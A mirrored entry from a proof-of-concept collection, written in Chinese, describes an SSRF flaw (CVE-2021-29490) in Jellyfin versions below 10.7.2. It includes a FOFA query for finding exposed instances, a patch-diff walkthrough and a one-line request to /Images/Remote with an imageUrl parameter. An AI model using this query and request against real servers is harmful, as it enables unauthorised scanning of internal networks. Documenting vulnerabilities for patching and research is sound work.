admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

51 lines
899 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490
## 漏洞描述
Jellyfin RemoteImageController.cs 文件中存在SSRF漏洞通过构造特殊的请求探测内网信息
## 漏洞影响
```
Jellyfin < 10.7.2
```
## FOFA
```
app="Jellyfin"
```
## 漏洞复现
在官方的更新文件中,查找到修改的文件
![](./images/202205241459343.png)
官方删除了某个方法
```
function getDisplayUrl(url, apiClient) {
return apiClient.getUrl('Images/Remote', { imageUrl: url });
}
```
下载漏洞版本源码,查找该接口对应的文件
```
Jellyfin.Api/Controllers/RemoteImageController.cs
```
![](./images/202205241459044.png)
其中接收的参数为 imageUrl 后续的代码片段存在SSRF漏洞
![](./images/202205241459542.png)
构造请求POC
```
/Images/Remote?imageUrl=http://www.baidu.com
```
![](./images/202205241459712.png)
Reference in New Issue View Git Blame Copy Permalink